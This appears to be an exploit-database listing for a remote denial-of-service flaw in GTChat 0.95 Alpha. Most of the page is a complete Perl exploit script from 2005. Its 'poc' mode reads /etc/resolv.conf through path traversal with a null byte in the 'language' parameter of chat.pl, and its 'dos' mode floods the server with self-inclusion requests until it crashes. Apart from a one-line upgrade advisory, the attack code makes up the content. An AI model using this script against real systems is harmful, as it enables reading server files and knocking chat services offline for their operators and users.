header-logo
Suggest Exploit
vendor:
GTChat
by:
x97Rang
7,5
CVSS
HIGH
Denial of Service (DoS)
20
CWE
Product Name: GTChat
Affected Version From: 0.95 Alpha
Affected Version To: 0.95 Alpha
Patch Exists: YES
Related CWE: N/A
CPE: a:gtchat:gtchat
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2005

GTChat <= 0.95 Alpha remote DoS

GTChat <= 0.95 Alpha is vulnerable to a remote Denial of Service (DoS) attack. The vulnerability is due to insufficient input validation of the 'language' parameter in the 'chat.pl' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request with a malicious 'language' parameter to the vulnerable server. This will cause the server to crash, resulting in a DoS condition.

Mitigation:

Upgrade to the latest version of GTChat.
Source

Exploit-DB raw data:

#!/usr/bin/perl  

 use LWP::Simple;
    
 if (@ARGV < 3) 
{ 
    print "\nUsage: $0 [server] [path] [mode] [count for DoS]\n"; 
    print "sever -  URL chat\n"; 
    print "path  -  path to chat.pl\n"; 
    print "mode  -  poc or dos,\n"; 
    print "                    poc - simple check without DoS and exit,\n"; 
    print "                    dos - DoS, you must set count for requests in 4 argument.\n\n";
    exit (); 
}   
    $DoS      =     "dos";
    $POC      =     "poc"; 
    $server   =  $ARGV[0]; 
    $path     =  $ARGV[1]; 
    $mode     =  $ARGV[2]; 
    $count    =  $ARGV[3];
    print qq(
                                           ###################################
                                           # GTChat <= 0.95 Alpha remote DoS #
                                           #   tested on GTChat 0.95 Alpha   #
                                           # (c)oded by x97Rang 2005 RST/GHC #
                                           #    Respect: b1f, 1dt.w0lf, ed   #
                                           ################################### );
 if ($mode eq $POC)
{  
    print "\n\nTry read file /etc/resolv.conf, maybe remote system unix...\n";
    $URL = sprintf("http://%s%s/chat.pl?language=../../../../../../../../../../etc/resolv.conf%00 HTTP/1.0\nHost: %s\nAccept:*/*\nConnection:close\n\n",$server,$path,$server);  
    $content = get "$URL";
 if ($content =~ /(domain|sortlist|options|search|nameserver|dhclient)/) 
{   print "File read successfully, remote system is *nix and $server are VULNERABLE!\n"; exit(); }
 if ($content =~ /Fatal error/)
{ 
    print "File read failed, but *Fatal error* returned, $server MAYBE vulnerable, check all output:\n"; 
    print "=== OUTPUT ===============================================================================\n"; 
    print "\n$content\n"; 
    print "=============================================================================== OUTPUT ===\n";
    exit();
}
 else { print "Hmm.. if you arguments right, then $server NOT vulnerable, go sleep :)\n"; }
}
 if ($mode eq $DoS)
{
 if (!($count)) { print "\nNeed count for DoS requests, you don't set it, exit...\n"; exit() }
    print "\nSend $count DoS requests to $server...\n";
   $URL = sprintf("http://%s%schat.pl?language=chat.pl%00 HTTP/1.0\nHost: %s\nAccept:*/*\nConnection:close\n\n",$server,$path,$server);
 for ($count_ov = 0; $count_ov != $count; $count_ov++) { $content = get "$URL"; }
    print "Done, packets sended.\n";
}

# milw0rm.com [2005-08-18]

Navigation

Suggest Exploit

Services By CQR